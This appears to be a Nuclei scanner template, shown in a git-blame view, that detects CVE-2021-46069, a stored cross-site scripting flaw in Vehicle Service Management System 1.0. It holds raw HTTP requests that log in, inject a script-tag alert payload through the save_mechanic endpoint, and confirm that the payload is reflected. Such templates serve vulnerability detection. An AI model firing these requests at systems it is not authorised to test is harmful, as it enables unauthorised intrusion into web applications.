2022-09-08 13:28:46 +00:00
|
|
|
id: CVE-2021-46069
|
|
|
|
|
|
|
|
info:
|
2022-09-10 01:55:52 +00:00
|
|
|
name: Vehicle Service Management System 1.0 - Stored Cross Site Scripting
|
2022-09-08 13:28:46 +00:00
|
|
|
author: TenBird
|
2022-09-10 02:12:57 +00:00
|
|
|
severity: medium
|
2022-09-08 13:28:46 +00:00
|
|
|
description: |
|
2022-09-10 01:55:52 +00:00
|
|
|
Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Mechanic List section in login panel.
|
2022-09-08 13:28:46 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS
|
|
|
|
- https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss
|
|
|
|
- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-46069
|
|
|
|
classification:
|
2022-09-10 02:12:57 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 4.8
|
2022-09-10 01:55:52 +00:00
|
|
|
cve-id: CVE-2021-46069
|
2022-09-10 02:12:57 +00:00
|
|
|
cwe-id: CWE-79
|
2023-07-11 19:49:27 +00:00
|
|
|
epss-score: 0.00093
|
2023-04-12 10:55:48 +00:00
|
|
|
cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:*
|
2022-09-08 13:28:46 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 3
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: vehicle_service_management_system_project
|
|
|
|
product: vehicle_service_management_system
|
2022-09-08 13:28:46 +00:00
|
|
|
tags: cve,cve2021,xss,vms,authenticated
|
2022-09-10 01:55:52 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-09-08 13:28:46 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /classes/Login.php?f=login HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
|
|
|
|
username={{username}}&password={{password}}
|
|
|
|
- |
|
|
|
|
POST /classes/Master.php?f=save_mechanic HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
id=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&email=asd1@asd.com&status=1
|
|
|
|
- |
|
|
|
|
GET /admin/?page=mechanics HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
2023-07-11 19:49:27 +00:00
|
|
|
cookie-reuse: true
|
2022-09-08 13:28:46 +00:00
|
|
|
req-condition: true
|
2022-10-07 21:27:25 +00:00
|
|
|
host-redirects: true
|
2022-09-08 13:28:46 +00:00
|
|
|
max-redirects: 2
|
2023-07-11 19:49:27 +00:00
|
|
|
|
2022-09-08 13:28:46 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
2023-06-19 21:10:30 +00:00
|
|
|
- "contains(header_3, 'text/html')"
|
2022-09-08 13:28:46 +00:00
|
|
|
- "status_code_3 == 200"
|
|
|
|
- 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
|
|
|
|
condition: and
|